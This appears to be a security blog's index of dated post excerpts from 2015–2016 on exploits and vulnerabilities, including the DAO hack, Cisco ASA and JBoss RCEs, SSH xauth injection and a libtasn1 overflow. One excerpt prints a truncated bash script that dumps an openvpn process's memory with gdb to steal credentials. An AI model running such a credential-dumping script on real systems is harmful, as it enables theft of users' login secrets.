June 21, 2016
Cryptocurrency and Smart-Contracts security fail: the Ethereum $59 Million hack
Ethers is a cryptocurrency designed to power smart-contracts, autonomous programs that define how an amount of money will behave. A simple race condition in a very large smart-contract code allowed an attacker to steal $59 million of value from the DAO account: Bitcoin’s Largest Competitor Hacked: Over $59 Million “Ethers” Stolen In Ongoing Attack. Details here […]
June 16, 2016
Security nightmares are going Low-Level
Java and Flash have been and still are terrible 3rd party components when it comes to the security of our PCs. While from a functional point of view they were rocket science in the ’90 (anybody who remember ActiveX would agree) nowadays they are sluggish, weakly integrated, rectangles in our web pages. Finally both Oracle and Adobe […]
May 18, 2016
Cisco ASA Exploit Released!
On February 2016 we sent an Early Warnings to our customers for a remote code execution (RCE) in Cisco ASA (CVE-2016-1287 or cisco-sa-20160210-asa-ike). Today a POC has been published: https://github.com/exodusintel/disclosures/blob/master/CVE_2016_1287_PoC You can fond more details on: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160210-asa-ike https://blog.exodusintel.com/2016/02/10/firewall-hacking/
March 14, 2016
Time to supercharge your restricted SSH accounts!
Time to hack restricted SSH accounts thanks to an injection in the “xauth” command! Not an exploit for everyone but CVE-2016-3115 and CVE-2016-3116 details have just been published on Full Disclosure, and they will be useful to a lot of people for sure :) If your remote provider gives you a restricted SSH access using a forced-command […]
November 20, 2015
JSF ViewState upside-down
Renaud Dubourguais and Nicolas Collignon released a nice paper on Java Server Faces security titled JSF ViewState upside-down (http://www.synacktiv.fr/ressources/JSF_ViewState_InYourFace.pdf). JSF implementations are often used in J2EE applications. JSF uses ViewStates which have already been discussed for cryptographic weaknesses like with the oracle padding attack [PADDING]. ViewStates have also been abused to create client side attacks […]
October 25, 2015
Grab credentials from a running openvpn process in Linux
#!/bin/bash # This little hack-job will grab credentials from a running openvpn process in Linux # Keep in mind this won’t work if the user used the –auth-nocache flag grep rw-p /proc/$1/maps | sed -n ‘s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p’ | while read start stop; do gdb –batch-silent –silent –pid $1 -ex “dump memory $1-$start-$stop.dump 0x$start 0x$stop”; […]
October 9, 2015
Fishing the AWS IP Pool for Dangling Domains
Fishing the AWS IP Pool for Dangling Domains: Amazon and other cloud providers have made it child’s play to spin up ephemeral server instances for quick deployment of various services. If you want a web server to host your new .io domain name, you can have it set up in no time at all. Starting a website […]
October 9, 2015
Netgear R6200 wireless router pwnage
http://shadow-file.blogspot.it/2015/04/broken-abandoned-and-forgotten-code_22.html http://shadow-file.blogspot.it/2015/04/abandoned-part-01.html http://shadow-file.blogspot.it/2015/04/abandoned-part-02.html http://shadow-file.blogspot.it/2015/05/abandoned-part-03.html http://shadow-file.blogspot.it/2015/05/abandoned-part-04.html http://shadow-file.blogspot.it/2015/05/abandoned-part-05.html http://shadow-file.blogspot.it/2015/05/abandoned-part-06.html http://shadow-file.blogspot.it/2015/06/abandoned-part-07.html http://shadow-file.blogspot.it/2015/06/abandoned-part-08.html http://shadow-file.blogspot.it/2015/06/abandoned-part-09.html http://shadow-file.blogspot.it/2015/07/abandoned-part-10.html http://shadow-file.blogspot.it/2015/07/abandoned-part-11.html http://shadow-file.blogspot.it/2015/09/abandoned-part-12.html http://shadow-file.blogspot.it/2015/10/abandoned-part-13.html There is even a Github repository for the project!
March 31, 2015
Stack overflow in libtasn1
Stack overflow in libtasn1: libtasn1 is a library to parse ASN.1 data structures. Its most prominent user is GnuTLS. Fuzzing libtasn1 led to the discovery of a stack write overflow in the function _asn1_ltostr (file parser_aux.c). It overflows a temporary buffer variable on certain inputs. This issue has been reported to the developers on 2015-03-26. A fix was released […]
March 31, 2015
JBoss JMXInvokerServlet Remote Command Execution
JBoss JMXInvokerServlet Remote Command Execution: This code exploits a common misconfiguration in JBoss Application Server. Whenever the JMX Invoker is exposed with the default configuration, a malicious “MarshalledInvocation” serialized Java object allows to execute arbitrary code. This exploit works even if the “Web-Console” and the “JMX Console” are protected or disabled.